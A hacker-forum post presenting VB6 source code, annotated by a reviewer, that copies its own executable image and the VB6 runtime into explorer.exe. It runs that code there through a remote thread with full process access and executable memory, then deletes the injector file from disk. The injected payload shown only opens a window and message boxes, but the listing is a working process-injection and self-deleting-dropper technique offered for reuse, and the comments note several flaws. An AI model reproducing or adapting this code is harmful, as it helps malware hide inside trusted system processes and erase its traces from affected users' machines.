文章作者:零号(暗夜盛装)
信息来源:黑客动画吧
QUOTE:
这是把本程序的映像按原基址写入 EXPLORER.EXE（Progman 窗口所属进程）的地址空间、再用远程线程执行的核心代码，终于突破了。
Option Explicit

' ---------------------------------------------------------------------------
' Win32 API declarations for the injector below (VB6 module).
' Only about a third of these are actually called in this listing; the rest
' look like leftovers from a generic template and are marked "(unused here)".
' The injection path itself needs: OpenProcess, VirtualAllocEx,
' WriteProcessMemory and CreateRemoteThread on the target side, plus
' GetModuleHandleA and CopyMemory to read this exe's own PE headers.
' Parameters declared without ByVal are passed by reference; for "As Any"
' parameters that means a caller must write ByVal explicitly to pass a value
' instead of the address of a variable (see the VirtualFreeEx note).
' ---------------------------------------------------------------------------

' Opens a handle to another process; Main requests PROCESS_ALL_ACCESS.
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
' Allocates memory inside another process; lpAddress = 0 lets the system pick.
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal ProcessHandle As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
' NOTE(review): lpAddress is ByRef "As Any" (unlike VirtualAllocEx above).
' Main calls this with a plain Long variable and no ByVal, so the API receives
' the address of that local variable, not the module base it meant to free.
Public Declare Function VirtualFreeEx Lib "kernel32" (ByVal ProcessHandle As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
' Returns the thread id; the owning process id is written through lpdwProcessId.
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
' (unused here)
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
' Both names are ByVal "As Any" so a caller may pass a String or 0& for "any".
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As Any, ByVal lpWindowName As Any) As Long
' Starts a thread in another process. lpThreadAttributes, lpStartAddress and
' lpParameter are ByRef in this declaration, so Main passes each with an
' explicit ByVal.
Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpthreadid As Long) As Long
' (unused here)
Public Declare Function CreateThread Lib "kernel32" (ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpthreadid As Long) As Long
' Base address of a module already loaded in the calling process;
' vbNullString / 0& means the process's own executable.
Public Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As Any) As Long
' Writes into another process's memory; lpBaseAddress and lpBuffer are ByRef As Any.
Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal ProcessHandle As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' Reads another process's memory; MainModule uses it on its own process.
Public Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' (unused here)
Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
' (unused here)
Public Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long
' Used for the visible confirmation boxes in MainModule and WndProc.
Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
' Used by MainModule to remove the injector's own executable from disk.
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
' (unused here)
Public Declare Function CreateEvent Lib "kernel32" Alias "CreateEventA" (ByVal lpEventAttributes As Long, ByVal bManualReset As Long, ByVal bInitialState As Long, ByVal lpname As String) As Long
' NOTE(review): declared with 16-bit Integer parameters and return value where
' the API works with 32-bit values. Main only ever passes 0 and 261, so it
' works in practice, but the canonical declaration uses Long throughout.
Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Integer, ByVal lpFileName As String, ByVal nSize As Integer) As Integer
' Used inside the target by MainModule to open its own process.
Public Declare Function GetCurrentProcessId Lib "kernel32" () As Long
' (unused here) -- classic message-loop trio; MainModule spins on DoEvents instead.
Public Declare Function GetMessage Lib "user32" Alias "GetMessageA" (lpMsg As Msg, ByVal hwnd As Long, ByVal wMsgFilterMin As Long, ByVal wMsgFilterMax As Long) As Long
Public Declare Function TranslateMessage Lib "user32" (lpMsg As Msg) As Long
Public Declare Function DispatchMessage Lib "user32" Alias "DispatchMessageA" (lpMsg As Msg) As Long
' Shows the window MainModule creates.
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
' (unused here)
Public Declare Function LoadCursor Lib "user32" Alias "LoadCursorA" (ByVal hInstance As Long, ByVal lpCursorName As Any) As Long
' (unused here)
Public Declare Function LoadIcon Lib "user32" Alias "LoadIconA" (ByVal hInstance As Long, ByVal lpIconName As String) As Long
' (unused here)
Public Declare Function CreateFontIndirect Lib "gdi32" Alias "CreateFontIndirectA" (lpLogFont As LOGFONT) As Long
' (unused here)
Public Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long
' (unused here)
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
' Creates the "Hijacked Form" window inside the target (MainModule).
Public Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
' (unused here)
Public Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As Long
' (unused here)
Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
' Registers the window class whose procedure is WndProc (MainModule).
Public Declare Function RegisterClass Lib "user32" Alias "RegisterClassA" (Class As WNDCLASS) As Long
' (unused here)
Public Declare Function UnregisterClass Lib "user32" Alias "UnregisterClassA" (ByVal lpClassName As String, ByVal hInstance As Long) As Long
' Default message handling; WndProc forwards every message to it.
Public Declare Function DefWindowProc Lib "user32" Alias "DefWindowProcA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' (unused here) -- file I/O group; nothing in this listing opens, reads or
' writes a file. CloseHandle in particular is never called, so every handle
' opened below (OpenProcess in Main and in MainModule) is leaked.
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long
' (unused here) -- no API return value is ever checked in this listing.
Public Declare Function GetLastError Lib "kernel32" () As Long
' Used by MainModule's keep-alive loop.
Public Declare Sub Sleep Lib "kernel32" (ByVal time As Long)
' (unused here)
Public Declare Sub PostQuitMessage Lib "user32" (ByVal nExitCode As Long)
' (unused here)
Public Declare Sub ExitThread Lib "kernel32" (ByVal dwExitCode As Long)
' Main terminates the injector with this right after starting the remote thread.
Public Declare Sub ExitProcess Lib "kernel32" (ByVal dwExitCode As Long)
' RtlMoveMemory wrapper (memcpy). Main calls it with "ByVal <address>" as the
' source to read PE headers straight out of a mapped image.
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
' Win32 POINT (two 32-bit coordinates); only referenced by the Msg type below.
Public Type POINTAPI
    x As Long
    y As Long
End Type
' Win32 MSG structure, as used by GetMessage / TranslateMessage / DispatchMessage.
' Those three are declared but never called in this listing, so this type is
' effectively unused here.
Public Type Msg
    hwnd As Long
    message As Long
    wParam As Long
    lParam As Long
    time As Long
    pt As POINTAPI
End Type
' Win32 WNDCLASSA (ten fields, in API order). Some member names differ from
' the SDK's (lpfnwndproc, cbWndExtra2) but the layout is the SDK one.
' MainModule fills only lpfnwndproc, hbrBackground and lpszClassName before
' calling RegisterClass; every other field is left at its zero default.
Public Type WNDCLASS
    style As Long
    lpfnwndproc As Long
    cbClsextra As Long
    cbWndExtra2 As Long
    hInstance As Long
    hIcon As Long
    hCursor As Long
    hbrBackground As Long
    lpszMenuName As String
    lpszClassName As String
End Type
' Win32 LOGFONTA. Unused here: CreateFontIndirect, its only consumer, is
' declared but never called.
' NOTE(review): lfFaceName(32) declares 33 elements (0 To 32) under the default
' Option Base, one more than the 32-byte LF_FACESIZE field in the SDK struct.
Public Type LOGFONT
    lfHeight As Long
    lfWidth As Long
    lfEscapement As Long
    lfOrientation As Long
    lfWeight As Long
    lfItalic As Byte
    lfUnderline As Byte
    lfStrikeOut As Byte
    lfCharSet As Byte
    lfOutPrecision As Byte
    lfClipPrecision As Byte
    lfQuality As Byte
    lfPitchAndFamily As Byte
    lfFaceName(32) As Byte
End Type
' ---------------------------------------------------------------------------
' Constants. Most of this is a generic Win32 template. The ones this listing
' actually relies on are WS_OVERLAPPEDWINDOW (style of the window MainModule
' creates), the MEM_* / PAGE_EXECUTE_READWRITE flags, PROCESS_ALL_ACCESS and
' IMAGE_NUMBEROF_DIRECTIRY_ENRIES (sizes the PE data-directory array).
' WM_LBUTTONDOWN (&H201) and COLOR_WINDOW (5) are used as literals rather than
' by name in WndProc and MainModule.
' ---------------------------------------------------------------------------

' Window style bits (only WS_OVERLAPPEDWINDOW is referenced).
Public Const GWL_WNDPROC = (-4)
Public Const WS_VISIBLE = &H10000000
Public Const WS_CHILD = &H40000000
Public Const WS_THICKFRAME = &H40000
Public Const WS_TABSTOP = &H10000
Public Const WS_BORDER = &H800000
Public Const WS_OVERLAPPED = &H0&
Public Const WS_CAPTION = &HC00000
Public Const WS_SYSMENU = &H80000
Public Const WS_MINIMIZEBOX = &H20000
Public Const WS_MAXIMIZEBOX = &H10000
Public Const WS_OVERLAPPEDWINDOW = (WS_OVERLAPPED Or WS_CAPTION Or WS_SYSMENU Or WS_THICKFRAME Or WS_MINIMIZEBOX Or WS_MAXIMIZEBOX)
' Extended styles (unused here).
Public Const WS_EX_CLIENTEDGE = &H200&
Public Const WS_EX_WINDOWEDGE = &H100&
Public Const WS_EX_STATICEDGE = &H20000
' Window messages. WndProc compares against &H201 literally, i.e. WM_LBUTTONDOWN.
Public Const WM_SETTEXT = &HC
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_VSCROLL = &H115
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONUP = &H202
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_SHOWWINDOW = &H18
Public Const WM_DESTROY = &H2
Public Const WM_SETFONT = &H30
Public Const WM_COPY = &H301
Public Const WM_PASTE = &H302
' CreateFile access / disposition / share flags -- unused; nothing opens a file.
Public Const INVALID_HANDLE_VALUE = -1
Public Const GENERIC_WRITE = &H40000000
Public Const GENERIC_READ = &H80000000
Public Const GENERIC_ALL = &H10000000
Public Const FILE_ATTRIBUTE_NORMAL = &H80
Public Const CREATE_NEW = 1
Public Const CREATE_ALWAYS = 2
Public Const OPEN_EXISTING = 3
Public Const OPEN_ALWAYS = 4
Public Const FILE_SHARE_READ = &H1
Public Const FILE_SHARE_WRITE = &H2
Public Const TRUNCATE_EXISTING = 5
' Misc window-creation values (COLOR_WINDOW's value 5 appears literally in MainModule).
Public Const COLOR_WINDOW = 5
Public Const IDC_ARROW = 32512&
Public Const IDI_APPLICATION = 32512&
Public Const SW_SHOWNORMAL = 1
Public Const CW_USEDEFAULT = &H80000000
' Template naming; unused -- MainModule hard-codes "HijackedClass".
Public Const gClassName = "CustomClName"
Public Const gAppName = "Application caption"
' Declared but never assigned or read in this listing.
Public ghWnd As Long
' VirtualAllocEx flags: reserve and commit in one call, and make the pages
' readable, writable AND executable -- needed because the copied image is
' executed in place in the target (see Main).
Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_RELEASE = &H8000
Const PAGE_EXECUTE_READWRITE = &H40&
' Number of IMAGE_DATA_DIRECTORY entries in the optional header. The name is
' misspelled (SDK: IMAGE_NUMBEROF_DIRECTORY_ENTRIES) but the value 16 is right;
' IMAGE_OPTIONAL_HEADER32 below references it, so it is left as is.
Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
' PROCESS_ALL_ACCESS = &H1F0FFF. NOTE(review): this is the broadest possible
' request and needs full rights over the target; the injection calls made here
' (VirtualAllocEx / WriteProcessMemory / CreateRemoteThread) are documented to
' require only the PROCESS_CREATE_THREAD, PROCESS_QUERY_INFORMATION,
' PROCESS_VM_OPERATION, PROCESS_VM_WRITE and PROCESS_VM_READ subset.
Const STANDARD_RIGHTS_REQUIRED = &HF0000
Const SYNCHRONIZE = &H100000
Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
' PE data-directory entry (RVA + size), 8 bytes; 16 of these end the optional header.
Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type
' PE COFF file header, 20 bytes with these field sizes and no padding.
' Main never reads its fields; it only uses Len() of a variable of this type
' to skip from the "PE\0\0" signature to the optional header.
' (TimeDataStamp is the SDK's TimeDateStamp -- name only, layout unaffected.)
Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDataStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    Characteristics As Integer
End Type
' 32-bit PE optional header: 96 bytes of fixed fields followed by 16 8-byte
' data-directory entries (224 bytes total, no padding with these field sizes),
' matching the SDK IMAGE_OPTIONAL_HEADER32. Main reads only SizeOfImage, which
' it uses as the number of bytes to copy into the target process.
' Several names are misspelled relative to the SDK (SizeOfInitalizedData,
' SizeOfUninitalizedData, LoaerFlags); the layout is unaffected.
Type IMAGE_OPTIONAL_HEADER32
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitalizedData As Long
    SizeOfUninitalizedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    Reserved1 As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    Subsystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaerFlags As Long
    NumberOfRvaAndSizes As Long
    ' 16 entries, indexed 0 To 15.
    DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
End Type
' Declared but never referenced anywhere in this listing. Its member shares
' its name with the module-level Const szTarget below, which VB6 permits for
' UDT members.
Type test
    szTarget As String
End Type
' MZ (DOS) header at offset 0 of every PE image, 64 bytes with these field
' sizes. Main reads only e_lfanew, the file offset of the "PE\0\0" signature.
' (e_onvo is the SDK's e_ovno -- name only, layout unaffected.)
Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_onvo As Integer
    ' 4 reserved words (0 To 3).
    e_res(3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    ' 10 reserved words (0 To 9).
    e_res2(9) As Integer
    e_lfanew As Long
End Type
' Window class Main looks up with FindWindow to locate the target process.
' "Progman" is the Program Manager / desktop window class, which on classic
' Windows shells belongs to explorer.exe -- the target the page header names.
' Window class names are matched case-insensitively, so the capitalisation
' does not matter.
Const szTarget As String = "ProgMan"
' Fixed 261-byte buffer that receives this executable's path in Main and is
' then copied, byte for byte, into the target process. (Global = Public.)
Global szFileName As String * 261
' Entry point of the injector (Sub Main startup). Step by step -- note that
' not a single API return value is checked anywhere in this procedure:
'   1. Store this executable's path in the global szFileName.
'   2. Find the "ProgMan" window (szTarget), get its owning process id and
'      open that process with PROCESS_ALL_ACCESS.
'   3. Read this process's own PE headers (DOS header -> e_lfanew -> optional
'      header) to get SizeOfImage, then copy the whole in-memory image of this
'      exe into the target at the SAME base address it has here.
'   4. Do the same for msvbvm60.dll (the VB6 runtime) so the copied code has
'      its runtime available in the target.
'   5. Copy the exe path into the target, start a remote thread there at
'      HijackModule with that path's address as the argument, and exit.
' NOTE(review): the images are copied raw -- no relocation, no import
' resolution -- so this can only work when every module involved sits at the
' identical address in both processes and the target has nothing else mapped
' there. That presumes an environment without ASLR (pre-Vista era Windows)
' and a VB6 runtime not already loaded elsewhere in the target. The process
' handle is never closed before ExitProcess (CloseHandle is never called in
' this listing).
Public Sub Main()
    Dim PID As Long, ProcessHandle As Long
    Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule As Long
    ' Header copies used to locate SizeOfImage; TImageFileHeader is only ever
    ' passed to Len() as a size.
    Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER
    Dim ExeVariable As Long
    ' Full path of this exe (hModule 0 = the calling process's main module)
    ' into the 261-byte global buffer.
    GetModuleFileName 0, szFileName, 261
    ' Process id owning the "ProgMan" window. If FindWindow returns 0 nothing
    ' is written and PID stays 0, so the OpenProcess below fails unnoticed.
    GetWindowThreadProcessId FindWindow(szTarget, 0&), PID
    ' Full-access, non-inheritable handle to the target (0 on failure; unchecked).
    ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, PID)
    ' Base address of this exe's own mapped image (NULL name = the calling exe).
    Module = GetModuleHandleA(vbNullString)
    ' DOS header lives at the image base; e_lfanew points at the PE signature.
    CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)
    ' Optional header follows the 4-byte "PE\0\0" signature and the 20-byte
    ' file header. Len() is the unpadded UDT size, which here equals the
    ' Win32 sizes (64 / 20 / 224 bytes).
    CopyMemory PImageOptionalHeader, ByVal (Module + PImageDosHeader.e_lfanew + 4 + Len(TImageFileHeader)), Len(PImageOptionalHeader)
    ' SizeOfImage = size of the fully mapped image = how much is copied below.
    Size = PImageOptionalHeader.SizeOfImage
    ' NOTE(review): VirtualFreeEx.lpAddress is declared ByRef As Any, so this
    ' call passes the ADDRESS of the local variable Module, not the module
    ' base. Whatever it frees (if anything) is not the intended range, and the
    ' return value is ignored.
    VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE
    ' Reserve + commit SizeOfImage bytes of RWX memory in the target at this
    ' exe's own base address. Returns 0 if that range is not free there; the
    ' following write then targets address 0 and fails, also unchecked.
    NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    ' Raw copy of this exe's mapped image (ByVal Module = source pointer) into
    ' the target at the same base.
    WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, BytesWritten
    ' A 261-byte block in the target (address chosen by the system) holding a
    ' copy of this exe's path; its address becomes the remote thread's argument.
    ExeVariable = VirtualAllocEx(ProcessHandle, 0, 261, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    WriteProcessMemory ProcessHandle, ByVal ExeVariable, ByVal szFileName, 261, BytesWritten
    ' Same procedure for the VB6 runtime DLL the copied code depends on.
    Dim VBMod As Long, VBSize As Long, VBNewMod As Long
    VBMod = GetModuleHandleA("msvbvm60.dll")
    CopyMemory PImageDosHeader, ByVal VBMod, Len(PImageDosHeader)
    CopyMemory PImageOptionalHeader, ByVal (VBMod + PImageDosHeader.e_lfanew + 4 + Len(TImageFileHeader)), Len(PImageOptionalHeader)
    VBSize = PImageOptionalHeader.SizeOfImage
    ' Allocates at msvbvm60's base in the target. If the target already has
    ' that DLL (or anything else) mapped there this returns 0 and the write
    ' below fails silently. Note there is no VirtualFreeEx attempt this time.
    VBNewMod = VirtualAllocEx(ProcessHandle, VBMod, VBSize, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    WriteProcessMemory ProcessHandle, ByVal VBNewMod, ByVal VBMod, VBSize, BytesWritten
    ' Start HijackModule inside the target, running immediately (flags 0).
    ' AddressOf yields this process's address of the function; it is valid in
    ' the target only because the image was placed at the identical base.
    ' lpParameter = address of the path copy; TID receives the new thread id.
    ' The ByVal overrides are required because those parameters are ByRef in
    ' the Declare.
    CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf HijackModule), ByVal ExeVariable, 0, TID
    ' Exit at once. The remote thread in the target carries on and, in
    ' MainModule, deletes this executable from disk using the copied path.
    ExitProcess 0
End Sub
' Identity helper: returns the Long it is given, unchanged.
' Its only job is to turn an "AddressOf Proc" expression into a plain Long
' value that can be stored or passed ByVal to an API -- the usual VB6 idiom,
' since AddressOf is only accepted as a call argument.
Private Function GetAdd(Entrypoint As Long) As Long
    Dim fnPtr As Long
    fnPtr = Entrypoint
    GetAdd = fnPtr
End Function
' Body of the remote thread once it is executing inside the target process.
' Stuff is the address, in the target's own address space, of the 261-byte
' exe path that Main copied over. The parameter is ByRef here; HijackModule
' passes its own ByVal copy. This function never returns: it ends in an
' endless DoEvents/Sleep loop, and its declared String return value is never
' assigned.
Private Function MainModule(Stuff As Long) As String
    Dim BytesWritten As Long, wc As WNDCLASS, szExename As String * 261
    ' lngFileHandle, lngLength, Exec, lBytesRead and szTestName are declared
    ' but never used.
    Dim lngFileHandle As Long, lngLength As Long, Exec As String, lBytesRead As Long, szTestName As String
    ' Copy the path out of the buffer at Stuff. Since this now runs in the
    ' target, OpenProcess(GetCurrentProcessId) opens the target itself, so this
    ' is effectively a 261-byte memcpy through the debug API; VB copies the
    ' ANSI buffer back into szExename afterwards. The handle it opens is never
    ' closed, and "ByVal BytesWritten" passes the value 0 -- a NULL
    ' lpNumberOfBytesRead -- not the variable.
    ReadProcessMemory OpenProcess(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId), ByVal Stuff, ByVal szExename, 261, ByVal BytesWritten
    ' Minimal window class whose procedure is WndProc. hbrBackground = 5 is
    ' this file's COLOR_WINDOW value (NOTE(review): WNDCLASS normally takes
    ' COLOR_xxx + 1 -- verify). All other fields stay zero.
    With wc
        .lpfnwndproc = GetAdd(AddressOf WndProc)
        .hbrBackground = 5
        .lpszClassName = "HijackedClass"
    End With
    ' Result unchecked.
    RegisterClass wc
    ' Create and show (nCmdShow 1 = SW_SHOWNORMAL) a 340x240 top-level window
    ' at (100,100) titled "Hijacked Form". The hInstance passed is
    ' GetModuleHandleA(0&), i.e. the target process's own exe module, not the
    ' injected image.
    ShowWindow CreateWindowEx(0, "HijackedClass", "Hijacked Form", WS_OVERLAPPEDWINDOW, 100, 100, 340, 240, 0, 0, GetModuleHandleA(0&), ByVal 0&), 1
    ' Visible confirmation that the code is running in the target.
    MessageBox 0, "Hijack Module Working", "Sucess!", 0
    ' NOTE(review): removes the injector's own executable from disk, using the
    ' path handed over by Main -- self-deletion of the dropper, possible
    ' because Main has already called ExitProcess. Return value unchecked.
    DeleteFile szExename
    ' Keep this thread (and so the window) alive indefinitely; DoEvents pumps
    ' this thread's message queue so WndProc gets called.
    Do: DoEvents: Sleep 100: Loop
End Function
' Remote-thread entry point (ThreadProc shape: one ByVal Long argument, Long
' result). Main starts it inside the target with Stuff = address of the copied
' exe path. It simply hands off to MainModule; because MainModule loops
' forever, End Function is never reached and the Long result stays at its
' default of 0.
Public Function HijackModule(ByVal Stuff As Long) As Long
    Call MainModule(Stuff)
End Function
' Window procedure for the "HijackedClass" window created in MainModule.
' A left-button press (WM_LBUTTONDOWN = &H201) pops up a message box; every
' message, including that one, is then handed to DefWindowProc and its result
' returned.
Public Function WndProc(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Select Case wMsg
        Case WM_LBUTTONDOWN
            MessageBox 0, "提示A", "提示B", 0
    End Select
    WndProc = DefWindowProc(hwnd, wMsg, wParam, lParam)
End Function